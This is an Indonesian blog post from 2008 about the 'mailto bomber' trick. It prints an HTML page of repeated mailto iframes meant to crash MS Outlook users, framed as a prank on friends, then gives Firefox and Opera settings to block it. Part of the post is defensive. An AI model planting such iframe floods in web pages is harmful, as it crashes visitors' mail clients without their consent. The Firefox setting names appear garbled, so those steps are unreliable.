Aman dari mailto Bomber


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Sunday, December 14th, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Iya, emang udah usang, tapi tetep asyik bwt ngerjain pengguna Ms.OutLook ^_^” Belakangan ini banyak yang iseng masang link menuju halaman jebakan semacam ini sekedar untuk mengerjai teman. Yeah.. Protokol mailto. Protokol ini bisa menjadi salah satu ancaman serius bagi user. Anda pasti sudah familiar dengan protokol “mailto:”

Contoh penggunaannya: Email Saya

Apabila link Email Saya di klik, maka aplikasi default untuk Email akan terbuka. Dari sini mulai muncul banyak keisengan untuk memanfaatkan protokol tersebut sebagai sarana untuk membuat komputer target mengalami crash :D Contoh implementasi sederhana ntuk membuat pengguna MS.Outlook Crash:

spyro.html

<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>
<iframe src="mailto:admin@spyrozone.net"></iframe>

….. ulangi sebanyak-banyaknya asal ga kebanyakan ^_^

Nah, ada tips sederhana untuk menghindari ulah iseng seperti ini. Anda bisa mengkonfigurasi browser Anda agar tidak mengakses aplikasi eksternal ketika bertemu dengan protokol tersebut. Ikuti panduan berikut… ^_^

PENGGUNA MOZILLA FIREFOX

Ketik about:config pada Address Bar Anda kemudian Enter.

{image: mailto Firefox}

mailto Firefox

Pada form Filter, ketik network.protokol-handler Anda akan disuguhi beberapa konfigurasi untuk aplikasi eksternal. Modifikasi network.protokol-handler.eksternal.mailto. Klik 2x untuk mengubah valuenya menjadi False.

 

PENGGUNA OPERA

Ketik opera:config pada Address Bar Anda kemudian Enter.

{image: mailto Opera}

mailto Opera

Klik Sub Menu MAIL kemudian isikan nilai 0 (nol) pada Handler.

Sederhana bukan? Dan kini Anda bisa berselancar dengan nyaman ^_^


//E.O.F